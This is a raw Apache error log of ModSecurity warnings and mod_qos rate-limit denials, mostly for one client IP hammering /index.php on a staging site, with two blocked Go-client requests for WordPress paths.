[Tue May 26 20:00:47.347587 2026] [security2:error] [pid 112029:tid 112203] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7agAAATY"]
[Tue May 26 20:00:47.347896 2026] [security2:error] [pid 106517:tid 106721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulYZZc2DoU1lPnP1ntAAAAMs"]
[Tue May 26 20:00:47.361608 2026] [security2:error] [pid 106517:tid 106733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1n0gAAANc"]
[Tue May 26 20:00:47.369484 2026] [security2:error] [pid 112029:tid 112236] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7bAAAAVc"]
[Tue May 26 20:00:47.377047 2026] [security2:error] [pid 106517:tid 106653] [client 103.163.220.43:53099] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/panel.php"] [unique_id "ahWul4ZZc2DoU1lPnP1oSQAAAIg"]
[Tue May 26 20:00:47.386093 2026] [security2:error] [pid 112029:tid 112244] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7gwAAAV8"]
[Tue May 26 20:00:47.389014 2026] [security2:error] [pid 106517:tid 106775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1n6wAAAQE"]
[Tue May 26 20:00:47.390229 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1oAwAAALc"]
[Tue May 26 20:00:47.391743 2026] [security2:error] [pid 106517:tid 106657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1oAAAAAIw"]
[Tue May 26 20:00:47.392043 2026] [security2:error] [pid 106517:tid 106666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1n6QAAAJU"]
[Tue May 26 20:00:47.394559 2026] [security2:error] [pid 106517:tid 106664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1n6AAAAJM"]
[Tue May 26 20:00:47.396632 2026] [security2:error] [pid 106517:tid 106736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1n5wAAANo"]
[Tue May 26 20:00:47.400781 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1oAQAAAI4"]
[Tue May 26 20:00:47.401559 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1n5gAAAOY"]
[Tue May 26 20:00:47.405255 2026] [security2:error] [pid 106517:tid 106677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1n7AAAAKA"]
[Tue May 26 20:00:47.427292 2026] [security2:error] [pid 106517:tid 106772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1n6gAAAP4"]
[Tue May 26 20:00:47.428123 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1oCgAAAPE"]
[Tue May 26 20:00:47.436333 2026] [security2:error] [pid 106517:tid 106739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1oCAAAAN0"]
[Tue May 26 20:00:47.438413 2026] [security2:error] [pid 112029:tid 112235] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7igAAAVY"]
[Tue May 26 20:00:47.440010 2026] [security2:error] [pid 112029:tid 112242] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7jAAAAV0"]
[Tue May 26 20:00:47.442374 2026] [security2:error] [pid 112029:tid 112168] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7WAAAARM"]
[Tue May 26 20:00:47.445415 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1oAgAAAMY"]
[Tue May 26 20:00:47.882705 2026] [security2:error] [pid 106517:tid 106749] [client 103.163.220.11:51467] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/colors/coffee/"] [unique_id "ahWul4ZZc2DoU1lPnP1ocAAAAOc"]
[Tue May 26 20:00:47.917056 2026] [qos:error] [pid 106517:tid 106720] [client 45.148.10.120:46444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWul4ZZc2DoU1lPnP1olwAAAMo
[Tue May 26 20:00:47.919255 2026] [qos:error] [pid 106517:tid 106685] [client 45.148.10.120:46402] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWul4ZZc2DoU1lPnP1omAAAAKc
[Tue May 26 20:00:47.919487 2026] [qos:error] [pid 106517:tid 106720] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWul4ZZc2DoU1lPnP1omQAAAMo
[Tue May 26 20:00:47.920677 2026] [qos:error] [pid 106517:tid 106716] [client 45.148.10.120:46400] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWul4ZZc2DoU1lPnP1omwAAAMY
[Tue May 26 20:00:47.921460 2026] [qos:error] [pid 106517:tid 106776] [client 45.148.10.120:46408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWul4ZZc2DoU1lPnP1onAAAAQI
[Tue May 26 20:00:47.921491 2026] [qos:error] [pid 106517:tid 106742] [client 45.148.10.120:46362] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWul4ZZc2DoU1lPnP1onQAAAOA
[Tue May 26 20:00:47.921761 2026] [qos:error] [pid 106517:tid 106765] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWul4ZZc2DoU1lPnP1ongAAAPc
[Tue May 26 20:00:47.924694 2026] [qos:error] [pid 106517:tid 106652] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWul4ZZc2DoU1lPnP1oogAAAIc
[Tue May 26 20:00:47.928971 2026] [qos:error] [pid 106517:tid 106711] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWul4ZZc2DoU1lPnP1opQAAAME
[Tue May 26 20:00:47.934103 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:46430] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWul4ZZc2DoU1lPnP1opwAAAOE
[Tue May 26 20:00:48.119757 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:46400] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1ouAAAAMQ
[Tue May 26 20:00:48.119971 2026] [qos:error] [pid 106517:tid 106668] [client 45.148.10.120:46444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1otwAAAJc
[Tue May 26 20:00:48.121815 2026] [qos:error] [pid 106517:tid 106671] [client 45.148.10.120:46408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1ouQAAAJo
[Tue May 26 20:00:48.122556 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1ougAAAOE
[Tue May 26 20:00:48.125005 2026] [qos:error] [pid 106517:tid 106774] [client 45.148.10.120:46402] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1ouwAAAQA
[Tue May 26 20:00:48.127792 2026] [qos:error] [pid 112029:tid 112193] [client 45.148.10.120:46522] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumKFW0C-ajaCsyFc79wAAASw
[Tue May 26 20:00:48.128457 2026] [qos:error] [pid 106517:tid 106709] [client 45.148.10.120:46692] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1ovAAAAL8
[Tue May 26 20:00:48.130122 2026] [qos:error] [pid 106517:tid 106655] [client 45.148.10.120:46362] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1ovQAAAIo
[Tue May 26 20:00:48.130871 2026] [qos:error] [pid 106517:tid 106691] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1ovgAAAK0
[Tue May 26 20:00:48.134252 2026] [qos:error] [pid 106517:tid 106685] [client 45.148.10.120:46430] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1ovwAAAKc
[Tue May 26 20:00:48.253631 2026] [security2:error] [pid 106517:tid 106768] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1oXQAAAPo"]
[Tue May 26 20:00:48.270347 2026] [qos:error] [pid 106517:tid 106752] [client 45.148.10.120:46400] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1oyAAAAOo
[Tue May 26 20:00:48.271885 2026] [qos:error] [pid 106517:tid 106653] [client 45.148.10.120:46408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1oyQAAAIg
[Tue May 26 20:00:48.275134 2026] [security2:error] [pid 112029:tid 112286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7jwAAAYk"]
[Tue May 26 20:00:48.276372 2026] [security2:error] [pid 112029:tid 112177] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7nAAAARw"]
[Tue May 26 20:00:48.276928 2026] [security2:error] [pid 106517:tid 106767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1n7QAAAPk"]
[Tue May 26 20:00:48.276958 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1oDAAAAKw"]
[Tue May 26 20:00:48.296733 2026] [qos:error] [pid 106517:tid 106658] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWumIZZc2DoU1lPnP1o1QAAAI0
[Tue May 26 20:00:48.303392 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWumIZZc2DoU1lPnP1o2QAAAMQ
[Tue May 26 20:00:48.304821 2026] [security2:error] [pid 112029:tid 112228] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7lgAAAU8"]
[Tue May 26 20:00:48.311111 2026] [security2:error] [pid 112029:tid 112212] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7jgAAAT8"]
[Tue May 26 20:00:48.322869 2026] [security2:error] [pid 112029:tid 112224] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7iQAAAUs"]
[Tue May 26 20:00:48.334936 2026] [security2:error] [pid 112029:tid 112230] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7pAAAAVE"]
[Tue May 26 20:00:48.337833 2026] [security2:error] [pid 112029:tid 112284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7kQAAAYc"]
[Tue May 26 20:00:48.345285 2026] [security2:error] [pid 112029:tid 112174] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7rwAAARk"]
[Tue May 26 20:00:48.352853 2026] [security2:error] [pid 106517:tid 106696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1oLQAAALI"]
[Tue May 26 20:00:48.364028 2026] [security2:error] [pid 112029:tid 112216] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc7vwAAAUM"]
[Tue May 26 20:00:48.373263 2026] [security2:error] [pid 112029:tid 112281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7sQAAAYQ"]
[Tue May 26 20:00:48.377106 2026] [security2:error] [pid 112029:tid 112204] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7qgAAATc"]
[Tue May 26 20:00:48.383286 2026] [security2:error] [pid 106517:tid 106735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1oawAAANk"]
[Tue May 26 20:00:48.394225 2026] [security2:error] [pid 112029:tid 112229] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7rgAAAVA"]
[Tue May 26 20:00:48.394859 2026] [security2:error] [pid 106517:tid 106770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuloZZc2DoU1lPnP1oLgAAAPw"]
[Tue May 26 20:00:48.395127 2026] [security2:error] [pid 112029:tid 112279] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc70wAAAYI"]
[Tue May 26 20:00:48.398888 2026] [security2:error] [pid 106517:tid 106712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1obAAAAMI"]
[Tue May 26 20:00:48.400931 2026] [security2:error] [pid 112029:tid 112238] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc70AAAAVk"]
[Tue May 26 20:00:48.424334 2026] [security2:error] [pid 106517:tid 106692] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1oeQAAAK4"]
[Tue May 26 20:00:48.426257 2026] [security2:error] [pid 106517:tid 106760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1ocQAAAPI"]
[Tue May 26 20:00:48.429059 2026] [security2:error] [pid 112029:tid 112240] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulqFW0C-ajaCsyFc7qAAAAVs"]
[Tue May 26 20:00:48.443095 2026] [security2:error] [pid 106517:tid 106777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1ohAAAAQM"]
[Tue May 26 20:00:48.445491 2026] [security2:error] [pid 112029:tid 112277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc75AAAAYA"]
[Tue May 26 20:00:48.445816 2026] [security2:error] [pid 106517:tid 106679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1ofQAAAKE"]
[Tue May 26 20:00:48.448906 2026] [security2:error] [pid 112029:tid 112165] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc73gAAARA"]
[Tue May 26 20:00:48.451823 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul4ZZc2DoU1lPnP1oigAAAPE"]
[Tue May 26 20:00:48.452876 2026] [security2:error] [pid 112029:tid 112185] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc75gAAASQ"]
[Tue May 26 20:00:48.467048 2026] [security2:error] [pid 112029:tid 112175] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc75wAAARo"]
[Tue May 26 20:00:48.473778 2026] [security2:error] [pid 112029:tid 112259] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWul6FW0C-ajaCsyFc76QAAAW4"]
[Tue May 26 20:00:48.589120 2026] [qos:error] [pid 112029:tid 112278] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWumKFW0C-ajaCsyFc8GgAAAYE
[Tue May 26 20:00:48.594926 2026] [qos:error] [pid 106517:tid 106695] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumIZZc2DoU1lPnP1pIAAAALE
[Tue May 26 20:00:48.597969 2026] [qos:error] [pid 112029:tid 112233] [client 45.148.10.120:49466] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumKFW0C-ajaCsyFc8GwAAAVQ
